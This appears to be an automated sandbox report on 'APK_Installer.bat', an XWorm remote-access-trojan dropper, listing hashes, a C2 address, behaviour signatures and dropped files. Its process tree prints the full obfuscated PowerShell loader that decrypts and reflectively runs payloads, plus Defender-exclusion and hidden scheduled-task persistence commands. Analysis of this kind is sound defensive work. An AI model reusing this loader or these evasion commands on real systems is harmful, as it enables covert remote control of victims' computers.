Resubmissions

30-05-2024 17:45

240530-wb2ltafc3z 10

30-05-2024 17:42

240530-wac7tsfb8v 10

Analysis

  • max time kernel
    43s
  • max time network
    46s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    30-05-2024 17:42

General

  • Target

    APK_Installer.bat

  • Size

    302KB

  • MD5

    7a5f5944302b8298714b56ae2f138b7c

  • SHA1

    669b42f2f6e76895899d84d5ad7a12f23d951f13

  • SHA256

    3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552

  • SHA512

    73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120

  • SSDEEP

    6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj

Malware Config

Extracted

Family

xworm

C2

19.ip.gl.ply.gg:38173

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload (1 IoC)
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request (2 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 7 IoCs)

    Run PowerShell and hide display window.

  • Drops startup file (2 IoCs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) (1 TTP, 1 IoC)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe (1 IoC)
  • Modifies registry class (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (13 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of SetWindowsHookEx (1 IoC)
  • Suspicious use of WriteProcessMemory (26 IoCs)
  • Uses Task Scheduler COM API (1 TTP)

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_211_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_211.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4552
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_211.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_211.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3052
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_211.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_211.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2072
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3448
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3324
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1212
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              PID:3352
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
              6⤵
              • Creates scheduled task(s)
              PID:1940
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /delete /f /tn "Runtime Broker"
              6⤵
              PID:1276
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1EF.tmp.bat""
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:5036
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  7⤵
                  • Delays execution with timeout.exe
                  PID:2288

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (3KB)
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (1KB)
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (944B)
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (944B)
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (1KB)
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fw0yjg4r.psj.ps1 (60B)
  • C:\Users\Admin\AppData\Local\Temp\tmp1EF.tmp.bat (170B)
  • C:\Users\Admin\AppData\Roaming\startup_str_211.bat (302KB; same MD5/SHA1/SHA256/SHA512 as the submitted APK_Installer.bat)
  • C:\Users\Admin\AppData\Roaming\startup_str_211.vbs (115B)
